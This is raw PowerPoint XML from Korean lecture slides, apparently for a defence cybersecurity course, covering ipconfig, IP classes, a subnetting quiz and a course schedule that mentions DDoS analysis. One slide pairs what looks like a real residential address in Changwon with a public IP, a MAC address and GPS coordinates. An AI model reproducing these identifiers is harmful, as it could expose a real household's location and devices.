                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>네트워크</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>네트워크 실습 </a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="12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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>• </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>네트워크 구조 데모</a:t>
                      </a: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핑</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>경로 추적</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>• </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>네트워크 분석 도구</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>Tshark</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, Wireshark)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="12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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>실습</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="12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/Theory/T16 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>IPconfig</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a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>창원시 진해구 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>드림빌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>동        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>901</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>호</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>59.19.162.         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>103</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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err="1">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>NetworkIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>HostIP</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>52 S 468516 3889863</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>35.15118°N 128.65434°E</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>40-B0-76-A4-F1-CC</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>Ipconfig /all</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="240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/Theory/T16 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>Q) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>192.12.100.130</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>클래스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>네트워</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>IP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>호스트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>IP,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>기본 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>서브넷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t> 마스크는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="5C5C5C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Spoqa Han Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="5C5C5C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Spoqa Han Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>클래스 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>: C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>네트워크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>: 192.12.100.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>호스트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>: 130</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>기본 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>서브넷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t> 마스크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>: 255.255.255.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:srgbClr val="5C5C5C"/>
              </a:solidFill>
              <a:latin typeface="Spoqa Han Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>Net Address bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>더 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>확장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>할 수 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>      =&gt; Subnetting</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Plan/Defcybsec</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>강의안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국방 사이버 보안</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수치의 표현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진법</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음수</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hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>1-1</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7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>주차</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자료의 표현 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>종류</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>아스키코드</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
                        <a:t>파일헤더</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hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>1-2</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퀴즈 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>– Steganography</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hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>1-3</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운영체제 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>쉘</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프로세스 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>management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hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>2-1</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8</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운영체제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메모리 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>management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2-2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운영체제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2-3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hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>2-4</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3</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hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>3-1</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9</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hlinkClick r:id="rId11" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Sys-01</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hlinkClick r:id="rId12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Sys-06</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13" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Web-01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4</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네트워크 구조 데모</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4-1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4-2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10</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IP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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Web-06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Web-07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5</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11</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5-2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Sys-02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6</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>주차</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12</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="10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7.7 DDOS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>분석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7.7 DDOS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>분석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6-3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/Theory/T16 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>서브넷팅</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a:t>Net Address = IP &amp; Subnet Mask</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>Q) Net Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t>를 구하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t>최대 수용 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t>수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" err="1"/>
              <a:t>구하시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>IP</a:t>
